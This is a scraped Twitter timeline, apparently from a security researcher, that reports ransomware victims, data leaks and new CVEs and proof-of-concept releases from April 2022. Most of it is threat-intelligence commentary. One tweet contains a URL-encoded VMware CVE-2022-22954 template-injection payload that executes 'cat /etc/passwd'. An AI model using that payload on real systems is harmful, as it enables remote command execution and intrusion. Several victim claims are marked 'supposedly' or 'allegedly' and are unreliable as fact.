Soufiane Tahiri’s Tweets

13h

575,000 emails from Sawatzk. 432 GB leaked on #DistributedDenialofSecrets Clients include Du Pont, Lenovo, Whirlpool, Aveva, Wella, Johnson + Johnson, Cisco, Google, Swatch, Avito, Samsung, Microsoft, Western Union, Saint-gobain, Turkish Airlines, and British American Tobacco.

1

4

11

Julian Assange extradition order issued by London court

19h

Meantime Julian Assange extradition order issued by London court, he faces up to 175 years in prison.

cnn.com

WikiLeaks founder Julian Assange has moved one step closer to being extradited to the United States, where he is set to be tried on Espionage Act charges for his role in publishing classified...

1

Apr 20

After successfully locking Oil India, the #ransomware group trying to impersonate REvil (or maybe REvil ?!) added a new victim to their blog:Visotec Group. I'll be calling them useransom.187201 until an "official" name is given to them.

@ValeryMarchive

@SOSIntel

@ransomwaremap

3

28

62

426,000 emails from Tendertech, a firm specializing in processing financial and banking documents on behalf of businesses and entrepreneurs. Leaked on #DistributedDenialofSecrets Tendertech's partner banks include Transcapitalbank, Bank Uralsib, Bank Soyuz, RGS Bank,...

2

10

no surprise so far 100%

@CocaCola

lol

2

4

Topics to follow

Sign up to get Tweets about the Topics you follow in your Home timeline.

Carousel

#Stormous group started a poll to choose the next target... how the hell do they try to move from attacking low-hanging fruits to these high-profit targets... looking forward to seeing this.

4

12

25

GIF

read image description

ALT

Quote Tweet

Tob Trick

@trickleaks

· Apr 18

Account (nicknames): mango / frances --- mega.nz/file/vLRUXBzJ# --- #trickbotleaks #trickbot #ransomware #malware #conti #trickleaks @briankrebs @VK_Intel @MalwareTechBlog @pancak3lullz @ValeryMarchive @TechCrunch @LawrenceAbrams @Ionut_Ilascu @troyhunt

4

How to recover files encrypted by Yanlouwang

Kaspersky released decryptor for #Yanluowang #ransomware

securelist.com

Kaspersky experts have found a vulnerability in the Yanluowang encryption algorithm and created a free decryptor to help victims of this ransomware with recovering their files.

5

6

Soufiane Tahiri Retweeted

Apr 18

7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help>Contents area. CVE-2022-29072 PoC: github.com/kagancapar/CVE

1

5

12

Will

@BushidoToken

Apr 17

New Blog! Lessons from the Conti Leaks blog.bushidotoken.net/2022/04/lesson

17

311

820

Apr 14

Gentle reminder

Quote Tweet

SANS ISC

@sans_isc

· Apr 14

Please remember: Port 445 is just ONE of the ports that may reach #RPC (CVE-2022-26809) on Windows. #MSRPC does Port 135 (and high port) or in some cases HTTP as well. Don't "close some ports" but "only open ports you need open". #allowlist #dontblocklist

1

8

Apr 13

An other EoP on the Windows spooler service discovered in Oct, 2021..patched yesterday 😑 PoC released github.com/grigoritchy/po

1

24

50

Apr 12

Jetstar Airways Pty Ltd, operating as Jetstar, an Australian low-cost airline headquartered in Melbourne supposedly hit by #Quantum #ransomware group.

9

Apr 12

Ciments Guyanais hit by #ViceSocity #Ransomware group. Data leaked.

@ransomwaremap

@ValeryMarchive

@cyber_etc

3

6

#RussiaUkraineWar #CyberAttack

Few hits on shodan

1

6

1

9

#VMware CVE-2022-22954 PoC: catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d

GIF

read image description

ALT

4

85

229

Ministry of Culture of the Russian Federation allegedly breached, 230,000 emails (roughly 448Gb) leaked by #DistributedDenialofSecrets

@Cyberknow20

@SOSIntel

3

8

12

Still relevent. akamai.com/blog/security/

4

Ardèche a department in southeast France supposedly hit by #Lockbit #ransomware group.

@ValeryMarchive

@ransomwaremap

@cyber_etc

11

21

Metagenics, Inc. a nutrigenomics and lifestyle medicine company hit by #Cuba #Ransomware group.

1

3

6

Apr 7

😅

Quote Tweet

Mandiant

@Mandiant

· Apr 7

Today we announced our strategic partnership with @CrowdStrike, which brings the power of CrowdStrike’s Falcon platform to Mandiant’s industry-leading services helping to protect customers from #cyberthreats. Learn more.

mndt.info/3NNAOtP

2

8

Apr 7

BTW the victim wasn't claimed by the group :)

GIF

read image description

ALT

2

Example of passwords used by the victim that this sample comes from... Pass1234, seriously... guys🤦‍♀️🤦‍♂️

Quote Tweet

· Apr 7

Nice analysis from GReAT guys on #Blackcat securelist.com/a-bad-luck-bla

3

2

11

Nice analysis from GReAT guys on #Blackcat securelist.com/a-bad-luck-bla

1

4

The new #Alphv design holds some (probably useless but worth mentioning) metadata, the animation was generated using Blend and it's a Matroska Multimedia Container file /media/user/BETA/protected/code/x/raindrop/services/blog-app/dev/robocat_hd_v2.blend matroska.org/technical/diag

1

3

Bet9ja, an online bookmaker company that offers betting on major sporting events operating in Nigeria. Hit by #Blackcat / #Alphv #ransomware group.

2

11

North Carolina A&T State University (ncat.edu) added to #AlphV / #BlackCat #Ransomware group.

3

13

Could any of the lucky winners drop me a message? PLEASE. 😅

Quote Tweet

Forever

@f_0_r_e_v_e_r_

· Apr 6

Lucky winners, check your private messages

4

Apr 5

Vendors impacted by #Spring4Shell (obviously non exhaustive list) tools.cisco.com/security/cente vmware.com/security/advis community.developer.atlassian.com/t/attention-cv access.redhat.com/security/cve/C

1

4

Apr 5

The infamous Hydra Market (Russian-language service believed to be the world’s largest illegal darknet marketplace.) shut down by Germany’s Federal Criminal Police Office. Hydra’s bitcoin assets worth 23 million euros seized.

1

3

15

Apr 5

Panasonic Canada was hit by #Conti #Ransomware group, and part of the data started to leak.

2

42

64

#Stormous took a position against France following the diplomatic position of the latter against #Russia. While I know "Hatta" is somewhere in UEA have no idea what they mean by "We will say Hatta that in the future". I'm taking hints :)

6

2

11

#CyberAttack #RussiaUkraineWar

Over 20 years and 900,000 emails from VGTRK / ВГТРК (All-Russia State Television and Radio Broadcasting Company totalling more than 786Gb of data leaked by #DistributedDenialofSecrets and allegedly breached by

@xxNB65

@SOSIntel

@Cyberknow20

1

20

30

Soufiane Tahiri Retweeted

certutil,net,bitsadmin,nltest,reg...

3

10

This leak gives some insights on how the coders use Process hollowing, API unhooking, some LOLBins usage, Defender Folder exclusion...

Quote Tweet

Tob Trick

@trickleaks

· Apr 4

Account (nicknames): kaktus / collin / fuzz --- mega.nz/file/qXB2xBpJ# --- #trickbotleaks #trickbot #ransomware #malware #conti #trickleaks @briankrebs @VK_Intel @MalwareTechBlog @pancak3lullz @ValeryMarchive @TechCrunch @LawrenceAbrams @Ionut_Ilascu @troyhunt

2

44

110

Show this thread

Tob Trick

@trickleaks